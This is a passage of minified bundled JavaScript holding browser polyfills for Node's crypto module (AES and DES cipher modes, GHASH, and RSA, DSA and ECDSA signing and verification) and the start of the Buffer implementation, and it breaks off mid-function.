D,w,x=[];D=this._cache.get(this._autopadding);)w=this._mode.decrypt(this,D),x.push(w);return j.concat(x)},g.prototype._final=function(){var p=this._cache.flush();if(this._autopadding)return function _(p){var D=p[15];if(D<1||D>16)throw new Error("unable to decrypt data");for(var w=-1;++w<D;)if(p[w+(16-D)]!==D)throw new Error("unable to decrypt data");if(16!==D)return p.slice(0,16-D)}(this._mode.decrypt(this,p));if(p)throw new Error("data not multiple of block length")},g.prototype.setAutoPadding=function(p){return this._autopadding=!!p,this},b.prototype.add=function(p){this.cache=j.concat([this.cache,p])},b.prototype.get=function(p){var D;if(p){if(this.cache.length>16)return D=this.cache.slice(0,16),this.cache=this.cache.slice(16),D}else if(this.cache.length>=16)return D=this.cache.slice(0,16),this.cache=this.cache.slice(16),D;return null},b.prototype.flush=function(){if(this.cache.length)return this.cache},we.createDecipher=function M(p,D){var w=$[p.toLowerCase()];if(!w)throw new TypeError("invalid suite type");var x=F(D,!1,w.key,w.iv);return y(p,x.key,x.iv)},we.createDecipheriv=y},1835:(Pe,we,de)=>{var ie=de(848),j=de(4661),$=de(265).Buffer,ae=de(701),I=de(4003),Q=de(5461),F=de(1851);function g(p,D,w){I.call(this),this._cache=new _,this._cipher=new Q.AES(D),this._prev=$.from(w),this._mode=p,this._autopadding=!0}de(2270)(g,I),g.prototype._update=function(p){this._cache.add(p);for(var D,w,x=[];D=this._cache.get();)w=this._mode.encrypt(this,D),x.push(w);return $.concat(x)};var b=$.alloc(16,16);function _(){this.cache=$.allocUnsafe(0)}function y(p,D,w){var x=ie[p.toLowerCase()];if(!x)throw new TypeError("invalid suite type");if("string"==typeof D&&(D=$.from(D)),D.length!==x.key/8)throw new TypeError("invalid key length "+D.length);if("string"==typeof w&&(w=$.from(w)),"GCM"!==x.mode&&w.length!==x.iv)throw new TypeError("invalid iv length "+w.length);return"stream"===x.type?new ae(x.module,D,w):"auth"===x.type?new j(x.module,D,w):new g(x.module,D,w)}g.prototype._final=function(){var p=this._cache.flush();if(this._autopadding)return p=this._mode.encrypt(this,p),this._cipher.scrub(),p;if(!p.equals(b))throw this._cipher.scrub(),new Error("data not multiple of block length")},g.prototype.setAutoPadding=function(p){return this._autopadding=!!p,this},_.prototype.add=function(p){this.cache=$.concat([this.cache,p])},_.prototype.get=function(){if(this.cache.length>15){var p=this.cache.slice(0,16);return this.cache=this.cache.slice(16),p}return null},_.prototype.flush=function(){for(var p=16-this.cache.length,D=$.allocUnsafe(p),w=-1;++w<p;)D.writeUInt8(p,w);return $.concat([this.cache,D])},we.createCipheriv=y,we.createCipher=function M(p,D){var w=ie[p.toLowerCase()];if(!w)throw new TypeError("invalid suite type");var x=F(D,!1,w.key,w.iv);return y(p,x.key,x.iv)}},3486:(Pe,we,de)=>{var ie=de(265).Buffer,j=ie.alloc(16,0);function ae(Q){var F=ie.allocUnsafe(16);return F.writeUInt32BE(Q[0]>>>0,0),F.writeUInt32BE(Q[1]>>>0,4),F.writeUInt32BE(Q[2]>>>0,8),F.writeUInt32BE(Q[3]>>>0,12),F}function I(Q){this.h=Q,this.state=ie.alloc(16,0),this.cache=ie.allocUnsafe(0)}I.prototype.ghash=function(Q){for(var F=-1;++F<Q.length;)this.state[F]^=Q[F];this._multiply()},I.prototype._multiply=function(){for(var E,b,Q=function $(Q){return[Q.readUInt32BE(0),Q.readUInt32BE(4),Q.readUInt32BE(8),Q.readUInt32BE(12)]}(this.h),F=[0,0,0,0],_=-1;++_<128;){for(0!=(this.state[~~(_/8)]&1<<7-_%8)&&(F[0]^=Q[0],F[1]^=Q[1],F[2]^=Q[2],F[3]^=Q[3]),b=0!=(1&Q[3]),E=3;E>0;E--)Q[E]=Q[E]>>>1|(1&Q[E-1])<<31;Q[0]=Q[0]>>>1,b&&(Q[0]=Q[0]^225<<24)}this.state=ae(F)},I.prototype.update=function(Q){this.cache=ie.concat([this.cache,Q]);for(var F;this.cache.length>=16;)F=this.cache.slice(0,16),this.cache=this.cache.slice(16),this.ghash(F)},I.prototype.final=function(Q,F){return this.cache.length&&this.ghash(ie.concat([this.cache,j],16)),this.ghash(ae([0,Q,0,F])),this.state},Pe.exports=I},7841:Pe=>{Pe.exports=function we(de){for(var j,ie=de.length;ie--;){if(255!==(j=de.readUInt8(ie))){j++,de.writeUInt8(j,ie);break}de.writeUInt8(0,ie)}}},3e3:(Pe,we,de)=>{var ie=de(7110);we.encrypt=function(j,$){var ae=ie($,j._prev);return j._prev=j._cipher.encryptBlock(ae),j._prev},we.decrypt=function(j,$){var ae=j._prev;j._prev=$;var I=j._cipher.decryptBlock($);return ie(I,ae)}},9415:(Pe,we,de)=>{var ie=de(265).Buffer,j=de(7110);function $(ae,I,Q){var F=I.length,E=j(I,ae._cache);return ae._cache=ae._cache.slice(F),ae._prev=ie.concat([ae._prev,Q?I:E]),E}we.encrypt=function(ae,I,Q){for(var E,F=ie.allocUnsafe(0);I.length;){if(0===ae._cache.length&&(ae._cache=ae._cipher.encryptBlock(ae._prev),ae._prev=ie.allocUnsafe(0)),!(ae._cache.length<=I.length)){F=ie.concat([F,$(ae,I,Q)]);break}F=ie.concat([F,$(ae,I.slice(0,E=ae._cache.length),Q)]),I=I.slice(E)}return F}},6616:(Pe,we,de)=>{var ie=de(265).Buffer;function j(ae,I,Q){for(var _,y,E=-1,b=0;++E<8;)b+=(128&(y=ae._cipher.encryptBlock(ae._prev)[0]^(_=I&1<<7-E?128:0)))>>E%8,ae._prev=$(ae._prev,Q?_:y);return b}function $(ae,I){var Q=ae.length,F=-1,E=ie.allocUnsafe(ae.length);for(ae=ie.concat([ae,ie.from([I])]);++F<Q;)E[F]=ae[F]<<1|ae[F+1]>>7;return E}we.encrypt=function(ae,I,Q){for(var F=I.length,E=ie.allocUnsafe(F),g=-1;++g<F;)E[g]=j(ae,I[g],Q);return E}},5927:(Pe,we,de)=>{var ie=de(265).Buffer;function j($,ae,I){var F=$._cipher.encryptBlock($._prev)[0]^ae;return $._prev=ie.concat([$._prev.slice(1),ie.from([I?ae:F])]),F}we.encrypt=function($,ae,I){for(var Q=ae.length,F=ie.allocUnsafe(Q),E=-1;++E<Q;)F[E]=j($,ae[E],I);return F}},6735:(Pe,we,de)=>{var ie=de(7110),j=de(265).Buffer,$=de(7841);function ae(Q){var F=Q._cipher.encryptBlockRaw(Q._prev);return $(Q._prev),F}we.encrypt=function(Q,F){var E=Math.ceil(F.length/16),g=Q._cache.length;Q._cache=j.concat([Q._cache,j.allocUnsafe(16*E)]);for(var b=0;b<E;b++){var _=ae(Q),y=g+16*b;Q._cache.writeUInt32BE(_[0],y+0),Q._cache.writeUInt32BE(_[1],y+4),Q._cache.writeUInt32BE(_[2],y+8),Q._cache.writeUInt32BE(_[3],y+12)}var M=Q._cache.slice(0,F.length);return Q._cache=Q._cache.slice(F.length),ie(F,M)}},8564:(Pe,we)=>{we.encrypt=function(de,ie){return de._cipher.encryptBlock(ie)},we.decrypt=function(de,ie){return de._cipher.decryptBlock(ie)}},848:(Pe,we,de)=>{var ie={ECB:de(8564),CBC:de(3e3),CFB:de(9415),CFB8:de(5927),CFB1:de(6616),OFB:de(5651),CTR:de(6735),GCM:de(6735)},j=de(4946);for(var $ in j)j[$].module=ie[j[$].mode];Pe.exports=j},5651:(Pe,we,de)=>{var ie=de(5449).Buffer,j=de(7110);function $(ae){return ae._prev=ae._cipher.encryptBlock(ae._prev),ae._prev}we.encrypt=function(ae,I){for(;ae._cache.length<I.length;)ae._cache=ie.concat([ae._cache,$(ae)]);var Q=ae._cache.slice(0,I.length);return ae._cache=ae._cache.slice(I.length),j(I,Q)}},701:(Pe,we,de)=>{var ie=de(5461),j=de(265).Buffer,$=de(4003);function I(Q,F,E,g){$.call(this),this._cipher=new ie.AES(F),this._prev=j.from(E),this._cache=j.allocUnsafe(0),this._secCache=j.allocUnsafe(0),this._decrypt=g,this._mode=Q}de(2270)(I,$),I.prototype._update=function(Q){return this._mode.encrypt(this,Q,this._decrypt)},I.prototype._final=function(){this._cipher.scrub()},Pe.exports=I},4271:(Pe,we,de)=>{var ie=de(928),j=de(8931),$=de(848),ae=de(8156),I=de(1851);function E(_,y,M){if(_=_.toLowerCase(),$[_])return j.createCipheriv(_,y,M);if(ae[_])return new ie({key:y,iv:M,mode:_});throw new TypeError("invalid suite type")}function g(_,y,M){if(_=_.toLowerCase(),$[_])return j.createDecipheriv(_,y,M);if(ae[_])return new ie({key:y,iv:M,mode:_,decrypt:!0});throw new TypeError("invalid suite type")}we.createCipher=we.Cipher=function Q(_,y){var M,p;if(_=_.toLowerCase(),$[_])M=$[_].key,p=$[_].iv;else{if(!ae[_])throw new TypeError("invalid suite type");M=8*ae[_].key,p=ae[_].iv}var D=I(y,!1,M,p);return E(_,D.key,D.iv)},we.createCipheriv=we.Cipheriv=E,we.createDecipher=we.Decipher=function F(_,y){var M,p;if(_=_.toLowerCase(),$[_])M=$[_].key,p=$[_].iv;else{if(!ae[_])throw new TypeError("invalid suite type");M=8*ae[_].key,p=ae[_].iv}var D=I(y,!1,M,p);return g(_,D.key,D.iv)},we.createDecipheriv=we.Decipheriv=g,we.listCiphers=we.getCiphers=function b(){return Object.keys(ae).concat(j.getCiphers())}},928:(Pe,we,de)=>{var ie=de(4003),j=de(1462),$=de(2270),ae=de(265).Buffer,I={"des-ede3-cbc":j.CBC.instantiate(j.EDE),"des-ede3":j.EDE,"des-ede-cbc":j.CBC.instantiate(j.EDE),"des-ede":j.EDE,"des-cbc":j.CBC.instantiate(j.DES),"des-ecb":j.DES};function Q(F){ie.call(this);var b,E=F.mode.toLowerCase(),g=I[E];b=F.decrypt?"decrypt":"encrypt";var _=F.key;ae.isBuffer(_)||(_=ae.from(_)),("des-ede"===E||"des-ede-cbc"===E)&&(_=ae.concat([_,_.slice(0,8)]));var y=F.iv;ae.isBuffer(y)||(y=ae.from(y)),this._des=g.create({key:_,iv:y,type:b})}I.des=I["des-cbc"],I.des3=I["des-ede3-cbc"],Pe.exports=Q,$(Q,ie),Q.prototype._update=function(F){return ae.from(this._des.update(F))},Q.prototype._final=function(){return ae.from(this._des.final())}},8156:(Pe,we)=>{we["des-ecb"]={key:8,iv:0},we["des-cbc"]=we.des={key:8,iv:8},we["des-ede3-cbc"]=we.des3={key:24,iv:8},we["des-ede3"]={key:24,iv:0},we["des-ede-cbc"]={key:16,iv:8},we["des-ede"]={key:16,iv:0}},2005:(Pe,we,de)=>{var ie=de(5449).Buffer,j=de(9423),$=de(2419);function I(F){var g,E=F.modulus.byteLength();do{g=new j($(E))}while(g.cmp(F.modulus)>=0||!g.umod(F.prime1)||!g.umod(F.prime2));return g}function Q(F,E){var g=function ae(F){var E=I(F);return{blinder:E.toRed(j.mont(F.modulus)).redPow(new j(F.publicExponent)).fromRed(),unblinder:E.invm(F.modulus)}}(E),b=E.modulus.byteLength(),_=new j(F).mul(g.blinder).umod(E.modulus),y=_.toRed(j.mont(E.prime1)),M=_.toRed(j.mont(E.prime2)),p=E.coefficient,D=E.prime1,w=E.prime2,x=y.redPow(E.exponent1).fromRed(),S=M.redPow(E.exponent2).fromRed(),O=x.isub(S).imul(p).umod(D).imul(w);return S.iadd(O).imul(g.unblinder).umod(E.modulus).toArrayLike(ie,"be",b)}Q.getr=I,Pe.exports=Q},2196:(Pe,we,de)=>{"use strict";Pe.exports=de(5207)},9494:(Pe,we,de)=>{"use strict";var ie=de(265).Buffer,j=de(2161),$=de(4539),ae=de(2270),I=de(2378),Q=de(1926),F=de(5207);function E(y){$.Writable.call(this);var M=F[y];if(!M)throw new Error("Unknown message digest");this._hashType=M.hash,this._hash=j(M.hash),this._tag=M.id,this._signType=M.sign}function g(y){$.Writable.call(this);var M=F[y];if(!M)throw new Error("Unknown message digest");this._hash=j(M.hash),this._tag=M.id,this._signType=M.sign}function b(y){return new E(y)}function _(y){return new g(y)}Object.keys(F).forEach(function(y){F[y].id=ie.from(F[y].id,"hex"),F[y.toLowerCase()]=F[y]}),ae(E,$.Writable),E.prototype._write=function(M,p,D){this._hash.update(M),D()},E.prototype.update=function(M,p){return this._hash.update("string"==typeof M?ie.from(M,p):M),this},E.prototype.sign=function(M,p){this.end();var D=this._hash.digest(),w=I(D,M,this._hashType,this._signType,this._tag);return p?w.toString(p):w},ae(g,$.Writable),g.prototype._write=function(M,p,D){this._hash.update(M),D()},g.prototype.update=function(M,p){return this._hash.update("string"==typeof M?ie.from(M,p):M),this},g.prototype.verify=function(M,p,D){var w="string"==typeof p?ie.from(p,D):p;this.end();var x=this._hash.digest();return Q(w,x,M,this._signType,this._tag)},Pe.exports={Sign:b,Verify:_,createSign:b,createVerify:_}},2378:(Pe,we,de)=>{"use strict";var ie=de(265).Buffer,j=de(4295),$=de(2005),ae=de(1875).ec,I=de(9423),Q=de(3262),F=de(1308);function M(S,O,U,K){if((S=ie.from(S.toArray())).length<O.byteLength()){var ee=ie.alloc(O.byteLength()-S.length);S=ie.concat([ee,S])}var se=U.length,ve=function D(S,O){S=(S=p(S,O)).mod(O);var U=ie.from(S.toArray());if(U.length<O.byteLength()){var K=ie.alloc(O.byteLength()-U.length);U=ie.concat([K,U])}return U}(U,O),le=ie.alloc(se);le.fill(1);var ye=ie.alloc(se);return ye=j(K,ye).update(le).update(ie.from([0])).update(S).update(ve).digest(),le=j(K,ye).update(le).digest(),{k:ye=j(K,ye).update(le).update(ie.from([1])).update(S).update(ve).digest(),v:le=j(K,ye).update(le).digest()}}function p(S,O){var U=new I(S),K=(S.length<<3)-O.bitLength();return K>0&&U.ishrn(K),U}function w(S,O,U){var K,ee;do{for(K=ie.alloc(0);8*K.length<S.bitLength();)O.v=j(U,O.k).update(O.v).digest(),K=ie.concat([K,O.v]);ee=p(K,S),O.k=j(U,O.k).update(O.v).update(ie.from([0])).digest(),O.v=j(U,O.k).update(O.v).digest()}while(-1!==ee.cmp(S));return ee}function x(S,O,U,K){return S.toRed(I.mont(U)).redPow(O).fromRed().mod(K)}Pe.exports=function g(S,O,U,K,ee){var se=Q(O);if(se.curve){if("ecdsa"!==K&&"ecdsa/rsa"!==K)throw new Error("wrong private key type");return function b(S,O){var U=F[O.curve.join(".")];if(!U)throw new Error("unknown curve "+O.curve.join("."));var se=new ae(U).keyFromPrivate(O.privateKey).sign(S);return ie.from(se.toDER())}(S,se)}if("dsa"===se.type){if("dsa"!==K)throw new Error("wrong private key type");return function _(S,O,U){for(var ye,K=O.params.priv_key,ee=O.params.p,se=O.params.q,ve=O.params.g,le=new I(0),z=p(S,se).mod(se),l=!1,f=M(K,se,S,U);!1===l;)le=x(ve,ye=w(se,f,U),ee,se),0===(l=ye.invm(se).imul(z.add(K.mul(le))).mod(se)).cmpn(0)&&(l=!1,le=new I(0));return function y(S,O){S=S.toArray(),O=O.toArray(),128&S[0]&&(S=[0].concat(S)),128&O[0]&&(O=[0].concat(O));var K=[48,S.length+O.length+4,2,S.length];return K=K.concat(S,[2,O.length],O),ie.from(K)}(le,l)}(S,se,U)}if("rsa"!==K&&"ecdsa/rsa"!==K)throw new Error("wrong private key type");if(void 0!==O.padding&&1!==O.padding)throw new Error("illegal or unsupported padding mode");S=ie.concat([ee,S]);for(var ve=se.modulus.byteLength(),le=[0,1];S.length+le.length+1<ve;)le.push(255);le.push(0);for(var ye=-1;++ye<S.length;)le.push(S[ye]);return $(le,se)},Pe.exports.getKey=M,Pe.exports.makeKey=w},1926:(Pe,we,de)=>{"use strict";var ie=de(265).Buffer,j=de(9423),$=de(1875).ec,ae=de(3262),I=de(1308);function g(b,_){if(b.cmpn(0)<=0)throw new Error("invalid sig");if(b.cmp(_)>=0)throw new Error("invalid sig")}Pe.exports=function Q(b,_,y,M,p){var D=ae(y);if("ec"===D.type){if("ecdsa"!==M&&"ecdsa/rsa"!==M)throw new Error("wrong public key type");return function F(b,_,y){var M=I[y.data.algorithm.curve.join(".")];if(!M)throw new Error("unknown curve "+y.data.algorithm.curve.join("."));return new $(M).verify(_,b,y.data.subjectPrivateKey.data)}(b,_,D)}if("dsa"===D.type){if("dsa"!==M)throw new Error("wrong public key type");return function E(b,_,y){var M=y.data.p,p=y.data.q,D=y.data.g,w=y.data.pub_key,x=ae.signature.decode(b,"der"),S=x.s,O=x.r;g(S,p),g(O,p);var U=j.mont(M),K=S.invm(p);return 0===D.toRed(U).redPow(new j(_).mul(K).mod(p)).fromRed().mul(w.toRed(U).redPow(O.mul(K).mod(p)).fromRed()).mod(M).mod(p).cmp(O)}(b,_,D)}if("rsa"!==M&&"ecdsa/rsa"!==M)throw new Error("wrong public key type");_=ie.concat([p,_]);for(var w=D.modulus.byteLength(),x=[1],S=0;_.length+x.length+2<w;)x.push(255),S+=1;x.push(0);for(var O=-1;++O<_.length;)x.push(_[O]);x=ie.from(x);var U=j.mont(D.modulus);b=(b=new j(b).toRed(U)).redPow(new j(D.publicExponent)),b=ie.from(b.fromRed().toArray());var K=S<8?1:0;for(w=Math.min(b.length,x.length),b.length!==x.length&&(K=1),O=-1;++O<w;)K|=b[O]^x[O];return 0===K}},7110:(Pe,we,de)=>{var ie=de(5449).Buffer;Pe.exports=function($,ae){for(var I=Math.min($.length,ae.length),Q=new ie(I),F=0;F<I;++F)Q[F]=$[F]^ae[F];return Q}},5449:(Pe,we,de)=>{"use strict";const ie=de(9742),j=de(4794),$="function"==typeof Symbol&&"function"==typeof Symbol.for?Symbol.for("nodejs.util.inspect.custom"):null;we.Buffer=F,we.SlowBuffer=function S(Oe){return+Oe!=Oe&&(Oe=0),F.alloc(+Oe)},we.INSPECT_MAX_BYTES=50;const ae=2147483647;function Q(Oe){if(Oe>ae)throw new RangeError('The value "'+Oe+'" is invalid for option "size"');const Te=new Uint8Array(Oe);return Object.setPrototypeOf(Te,F.prototype),Te}function F(Oe,Te,Le){if("number"==typeof Oe){if("string"==typeof Te)throw new TypeError('The "string" argument must be of type string. Received type number');return _(Oe)}return E(Oe,Te,Le)}function E(Oe,Te,Le){if("string"==typeof Oe)return function y(Oe,Te){if(("string"!=typeof Te||""===Te)&&(Te="utf8"),!F.isEncoding(Te))throw new TypeError("Unknown encoding: "+Te);const Le=0|O(Oe,Te);let $e=Q(Le);const st=$e.write(Oe,Te);return st!==Le&&($e=$e.slice(0,st)),$e}(Oe,Te);if(ArrayBuffer.isView(Oe))return function p(Oe){if(lt(Oe,Uint8Array)){const Te=new Uint8Array(Oe);return D(Te.buffer,Te.byteOffset,Te.byteLength)}return M(Oe)}(Oe);if(null==Oe)throw new TypeError("The first argument must be one of type string, Buffer, ArrayBuffer, Array, or Array-like Object. Received type "+typeof Oe);if(lt(Oe,ArrayBuffer)||Oe&&lt(Oe.buffer,ArrayBuffer)||"undefined"!=typeof SharedArrayBuffer&&(lt(Oe,SharedArrayBuffer)||Oe&&lt(Oe.buffer,SharedArrayBuffer)))return D(Oe,Te,Le);if("number"==typeof Oe)throw new TypeError('The "value" argument must not be of type number. Received type number');const $e=Oe.valueOf&&Oe.valueOf();if(null!=$e&&$e!==Oe)return F.from($e,Te,Le);const st=function w(Oe){if(F.isBuffer(Oe)){const Te=0|x(Oe.length),Le=Q(Te);return 0===Le.length||Oe.copy(Le,0,0,Te),Le}return void 0!==Oe.length?"number"!=typeof Oe.length||ft(Oe.length)?Q(0):M(Oe):"Buffer"===Oe.type&&Array.isArray(Oe.data)?M(Oe.data):void 0}(Oe);if(st)return st;if("undefined"!=typeof Symbol&&null!=Symbol.toPrimitive&&"function"==typeof Oe[Symbol.toPrimitive])return F.from(Oe[Symbol.toPrimitive]("string"),Te,Le);throw new TypeError("The first argument must be one of type string, Buffer, ArrayBuffer, Array, or Array-like Object. Received type "+typeof Oe)}function g(Oe){if("number"!=typeof Oe)throw new TypeError('"size" argument must be of type number');if(Oe<0)throw new RangeError('The value "'+Oe+'" is invalid for option "size"')}function _(Oe){return g(Oe),Q(Oe<0?0:0|x(Oe))}function M(Oe){const Te=Oe.length<0?0:0|x(Oe.length),Le=Q(Te);for(let $e=0;$e<Te;$e+=1)Le[$e]=255&Oe[$e];return Le}function D(Oe,Te,Le){if(Te<0||Oe.byteLength<Te)throw new RangeError('"offset" is outside of buffer bounds');if(Oe.byteLength<Te+(Le||0))throw new RangeError('"length" is outside of buffer bounds');let $e;return $e=void 0===Te&&void 0===Le?new Uint8Array(Oe):void 0===Le?new Uint8Array(Oe,Te):new Uint8Array(Oe,Te,Le),Object.setPrototypeOf($e,F.prototype),$e}function x(Oe){if(Oe>=ae)throw new RangeError("Attempt to allocate Buffer larger than maximum size: 0x"+ae.toString(16)+" bytes");return 0|Oe}function O(Oe,Te){if(F.isBuffer(Oe))return Oe.length;if(ArrayBuffer.isView(Oe)||lt(Oe,ArrayBuffer))return Oe.byteLength;if("string"!=typeof Oe)throw new TypeError('The "string" argument must be one of type string, Buffer, or ArrayBuffer. Received type '+typeof Oe);const Le=Oe.length,$e=arguments.length>2&&!0===arguments[2];if(!$e&&0===Le)return 0;let st=!1;for(;;)switch(Te){case"ascii":case"latin1":case"binary":return Le;case"utf8":case"utf-8":return rt(Oe).length;case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":return 2*Le;case"hex":return Le>>>1;case"base64":return ht(Oe).length;default:if(st)return $e?-1:rt(Oe).length;Te=(""+Te).toLowerCase(),st=!0}}function U(Oe,Te,Le){let $e=!1;if((void 0===Te||Te<0)&&(Te=0),Te>this.length||((void 0===Le||Le>this.length)&&(Le=this.length),Le<=0)||(Le>>>=0)<=(Te>>>=0))return"";for(Oe||(Oe="utf8");;)switch(Oe){case"hex":return L(this,Te,Le);case"utf8":case"utf-8":return A(this,Te,Le);case"ascii":return G(this,Te,Le);case"latin1":case"binary":return X(this,Te,Le);case"base64":return f(this,Te,Le);case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":return h(this,Te,Le);default:if($e)throw new TypeError("Unknown encoding: "+Oe);Oe=(Oe+"").toLowerCase(),$e=!0}}function K(Oe,Te,Le){const $e=Oe[Te];Oe[Te]=Oe[Le],Oe[Le]=$e}function ee(Oe,Te,Le,$e,st){if(0===Oe.length)return-1;if("string"==typeof Le?($e=Le,Le=0):Le>2147483647?Le=2147483647:Le<-2147483648&&(Le=-2147483648),ft(Le=+Le)&&(Le=st?0:Oe.length-1),Le<0&&(Le=Oe.length+Le),Le>=Oe.length){if(st)return-1;Le=Oe.length-1}else if(Le<0){if(!st)return-1;Le=0}if("string"==typeof Te&&(Te=F.from(Te,$e)),F.isBuffer(Te))return 0===Te.length?-1:se(Oe,Te,Le,$e,st);if("number"==typeof Te)return Te&=255,"function"==typeof Uint8Array.prototype.indexOf?st?Uint8Array.prototype.indexOf.call(Oe,Te,Le):Uint8Array.prototype.lastIndexOf.call(Oe,Te,Le):se(Oe,[Te],Le,$e,st);throw new TypeError("val must be string, number or Buffer")}function se(Oe,Te,Le,$e,st){let Ft,xt=1,pt=Oe.length,vt=Te.length;if(void 0!==$e&&("ucs2"===($e=String($e).toLowerCase())||"ucs-2"===$e||"utf16le"===$e||"utf-16le"===$e)){if(Oe.length<2||Te.length<2)return-1;xt=2,pt/=2,vt/=2,Le/=2}function Wi(zt,fa){return 1===xt?zt[fa]:zt.readUInt16BE(fa*xt)}if(st){let zt=-1;for(Ft=Le;Ft<pt;Ft++)if(Wi(Oe,Ft)===Wi(Te,-1===zt?0:Ft-zt)){if(-1===zt&&(zt=Ft),Ft-zt+1===vt)return zt*xt}else-1!==zt&&(Ft-=Ft-zt),zt=-1}else for(Le+vt>pt&&(Le=pt-vt),Ft=Le;Ft>=0;Ft--){let zt=!0;for(let fa=0;fa<vt;fa++)if(Wi(Oe,Ft+fa)!==Wi(Te,fa)){zt=!1;break}if(zt)return Ft}return-1}function ve(Oe,Te,Le,$e){Le=Number(Le)||0;const st=Oe.length-Le;$e?($e=Number($e))>st&&($e=st):$e=st;const xt=Te.length;let pt;for($e>xt/2&&($e=xt/2),pt=0;pt<$e;++pt){const vt=parseInt(Te.substr(2*pt,2),16);if(ft(vt))return pt;Oe[Le+pt]=vt}return pt}function le(Oe,Te,Le,$e){return mt(rt(Te,Oe.length-Le),Oe,Le,$e)}function ye(Oe,Te,Le,$e){return mt(function Ge(Oe){const Te=[];for(let Le=0;Le<Oe.length;++Le)Te.push(255&Oe.charCodeAt(Le));return Te}(Te),Oe,Le,$e)}function z(Oe,Te,Le,$e){return mt(ht(Te),Oe,Le,$e)}function l(Oe,Te,Le,$e){return mt(function Qe(Oe,Te){let Le,$e,st;const xt=[];for(let pt=0;pt<Oe.length&&!((Te-=2)<0);++pt)Le=Oe.charCodeAt(pt),$e=Le>>8,st=Le%256,xt.push(st),xt.push($e);return xt}(Te,Oe.length-Le),Oe,Le,$e)}function f(Oe,Te,Le){return ie.fromByteArray(0===Te&&Le===Oe.length?Oe:Oe.slice(Te,Le))}function A(Oe,Te,Le){Le=Math.min(Oe.length,Le);const $e=[];let st=Te;for(;st<Le;){const xt=Oe[st];let pt=null,vt=xt>239?4:xt>223?3:xt>191?2:1;if(st+vt<=Le){let Wi,Ft,zt,fa;switch(vt){case 1:xt<128&&(pt=xt);break;case 2:Wi=Oe[st+1],128==(192&Wi)&&(fa=(31&xt)<<6|63&Wi,fa>127&&(pt=fa));break;case 3:Wi=Oe[st+1],Ft=Oe[st+2],128==(192&Wi)&&128==(192&Ft)&&(fa=(15&xt)<<12|(63&Wi)<<6|63&Ft,fa>2047&&(fa<55296||fa>57343)&&(pt=fa));break;case 4:Wi=Oe[st+1],Ft=Oe[st+2],zt=Oe[st+3],128==(192&Wi)&&128==(192&Ft)&&128==(192&zt)&&(fa=(15&xt)<<18|(63&Wi)<<12|(63&Ft)<<6|63&zt,fa>65535&&fa<1114112&&(pt=fa))}}null===pt?(pt=65533,vt=1):pt>65535&&(pt-=65536,$e.push(pt>>>10&1023|55296),pt=56320|1023&pt),$e.push(pt),st+=vt}return function P(Oe){const Te=Oe.length;if(Te<=v)return String.fromCharCode.apply(String,Oe);let Le="",$e=0;for(;$e<Te;)Le+=String.fromCharCode.apply(String,Oe.slice($e,$e+=v));return Le}($e)}we.kMaxLength=ae,!(F.TYPED_ARRAY_SUPPORT=function I(){try{const Oe=new Uint8Array(1),Te={foo:function(){return 42}};return Object.setPrototypeOf(Te,Uint8Array.prototype),Object.setPrototypeOf(Oe,Te),42===Oe.foo()}catch(Oe){return!1}}())&&"undefined"!=typeof console&&"function"==typeof console.error&&console.error("This browser lacks typed array (Uint8Array) support which is required by `buffer` v5.x. Use `buffer` v4.x if you require old browser support."),Object.defineProperty(F.prototype,"parent",{enumerable:!0,get:function(){if(F.isBuffer(this))return this.buffer}}),Object.defineProperty(F.prototype,"offset",{enumerable:!0,get:function(){if(F.isBuffer(this))return this.byteOffset}}),F.poolSize=8192,F.from=function(Oe,Te,Le){return E(Oe,Te,Le)},Object.setPrototypeOf(F.prototype,Uint8Array.prototype),Object.setPrototypeOf(F,Uint8Array),F.alloc=function(Oe,Te,Le){return function b(Oe,Te,Le){return g(Oe),Oe<=0?Q(Oe):void 0!==Te?"string"==typeof Le?Q(Oe).fill(Te,Le):Q(Oe).fill(Te):Q(Oe)}(Oe,Te,Le)},F.allocUnsafe=function(Oe){return _(Oe)},F.allocUnsafeSlow=function(Oe){return _(Oe)},F.isBuffer=function(Te){return null!=Te&&!0===Te._isBuffer&&Te!==F.prototype},F.compare=function(Te,Le){if(lt(Te,Uint8Array)&&(Te=F.from(Te,Te.offset,Te.byteLength)),lt(Le,Uint8Array)&&(Le=F.from(Le,Le.offset,Le.byteLength)),!F.isBuffer(Te)||!F.isBuffer(Le))throw new TypeError('The "buf1", "buf2" arguments must be one of type Buffer or Uint8Array');if(Te===Le)return 0;let $e=Te.length,st=Le.length;for(let xt=0,pt=Math.min($e,st);xt<pt;++xt)if(Te[xt]!==Le[xt]){$e=Te[xt],st=Le[xt];break}return $e<st?-1:st<$e?1:0},F.isEncoding=function(Te){switch(String(Te).toLowerCase()){case"hex":case"utf8":case"utf-8":case"ascii":case"latin1":case"binary":case"base64":case"ucs2":case"ucs-2":case"utf16le":case"utf-16le":return!0;default:return!1}},F.concat=function(Te,Le){if(!Array.isArray(Te))throw new TypeError('"list" argument must be an Array of Buffers');if(0===Te.length)return F.alloc(0);let $e;if(void 0===Le)for(Le=0,$e=0;$e<Te.length;++$e)Le+=Te[$e].length;const st=F.allocUnsafe(Le);let xt=0;for($e=0;$e<Te.length;++$e){let pt=Te[$e];if(lt(pt,Uint8Array))xt+pt.length>st.length?(F.isBuffer(pt)||(pt=F.from(pt)),pt.copy(st,xt)):Uint8Array.prototype.set.call(st,pt,xt);else{if(!F.isBuffer(pt))throw new TypeError('"list" argument must be an Array of Buffers');pt.copy(st,xt)}xt+=pt.length}return st},F.byteLength=O,F.prototype._isBuffer=!0,F.prototype.swap16=function(){const Te=this.length;if(Te%2!=0)throw new RangeError("Buffer size must be a multiple of 16-bits");for(let Le=0;Le<Te;Le+=2)K(this,Le,Le+1);return this},F.prototype.swap32=function(){const Te=this.length;if(Te%4!=0)throw new RangeError("Buffer size must be a multiple of 32-bits");for(let Le=0;Le<Te;Le+=4)K(this,Le,Le+3),K(this,Le+1,Le+2);return this},F.prototype.swap64=function(){const Te=this.length;if(Te%8!=0)throw new RangeError("Buffer size must be a multiple of 64-bits");for(let Le=0;Le<Te;Le+=8)K(this,Le,Le+7),K(this,Le+1,Le+6),K(this,Le+2,Le+5),K(this,Le+3,Le+4);return this},F.prototype.toLocaleString=F.prototype.toString=function(){const Te=this.length;return 0===Te?"":0===arguments.length?A(this,0,Te):U.apply(this,arguments)},F.prototype.equals=function(Te){if(!F.isBuffer(Te))throw new TypeError("Argument must be a Buffer");return this===Te||0===F.compare(this,Te)},F.prototype.inspect=function(){let Te="";const Le=we.INSPECT_MAX_BYTES;return 